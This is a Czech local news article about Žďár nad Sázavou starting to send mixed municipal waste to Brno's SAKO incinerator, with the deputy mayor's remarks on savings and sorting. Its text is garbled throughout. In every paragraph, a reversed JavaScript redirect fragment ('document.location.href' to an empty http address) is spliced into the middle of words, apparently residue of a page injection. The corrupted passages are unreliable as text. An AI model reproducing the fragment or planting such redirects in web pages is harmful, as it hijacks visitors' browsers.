Rainbow page separator

Žďár začal vozit část komunálního odpadu do brněnské spalovny

Středa, 22. září 2021

Žďár nad Sázavou / Prvních devatenáct tun směsného komunálního odpadu nechala žďárská radnice odvézt do brněnské spalovny firmy SAKO. Zkušební svoz by měl pokračovat i ve zbývajících měsících le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošního roku. Jedná se o spalování „nadměru“ vyplývajícího z nové legislativy, kdy se současně zvyšuje i poplatek za jeho uložení na skládce.
„Zatím máme domluveno tisíc tun ročně a budeme hledat další spalovny, aby byl komunální odpad energeticky využívaný,“ sdělila žďárská mís[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tostarostka Ludmila Řezníčková s tím, že pro příští a další roky bude vypsáno zadávací řízení a měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to se bude snažit získat ke spolupráci i jiné spalovny. „Na jednom svozu jsme ušetřili asi 4,5 tisíce korun oproti uložení na skládce,“ doplnila mís[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tostarostka.
Žďárská radnice i nadále preferuje třídění komunálního odpadu, aby [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toho směsného vznikalo co možná nejméně. S tím korespondují i výsledky pasportizace míst pro odkládání odpadu ve městě, které deklarují, že 95 procent obyvatel Žďáru [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to nemá ke kontejnerům dále než dvě stě metrů. Více [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to může být v rodinné zástavbě či v osadách, kde měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to hodlá postupně rozmísťovat další kontejnerová hnízda.